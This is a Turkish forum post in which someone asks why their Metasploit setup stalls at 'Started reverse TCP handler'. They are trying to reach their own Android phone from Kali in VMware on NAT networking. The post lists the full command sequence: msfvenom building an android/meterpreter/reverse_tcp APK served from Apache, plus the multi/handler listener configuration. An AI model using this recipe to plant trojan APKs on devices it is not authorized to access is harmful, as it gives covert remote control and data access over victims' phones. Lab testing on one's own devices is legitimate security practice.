Merhabalar. Kendi android cihazıma .apk dosyası gondermek ve Kali uzerinden sızmak istiyorum. Fakat exploit komutunu verdikten sonra VMware'de terminal'de şu komut ekranında kalıyor.
Started reverse TCP handler on 192.168.x.xx:4444
ifconfig komutunu girdikten sonra cıkan IP adresini kopyalayıp o şekilde yapıyorum. Bu arada NAT secili ağ ayarlarından VMware'de.
Bir de ilginc bir durum şu kendi Android cihazımdan başlatmış olduğum IP adresine giremiyorum arkadaşlar.
Komutlar şunlar:
1. ifconfig
2. msfvenom -help
3. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R > /var/www/html/androidApp.apk
4. service apache2 status (Daha once başlatmıştım) service apache2 start komutu ile
5. msfconsole
6. use exploit/multi/handler
7. set payload android/meterpreter/reverse_tcp
8. show options
9. set LHOST 192.168.x.xx
10. show options (yeniden)
11. exploit
exploit işte bu komutu girdikten sonra şoyle bir komut satırı geliyor ve o ekranda kalıyor. Dediğim gibi bundan sonra telefona .apk dosyasını indirmek istiyorum ama sunucuya ulaşamıyorum telefonumdan Apache Server'e.
Boyle bir ekranda kalıyor. Rehberi buraya tıklayarak izleyebilirsiniz. Şuradaki adamın yaptığının aynısını yapıyorum.
[*] Started reverse TCP handler on 192.168.x.xx:4444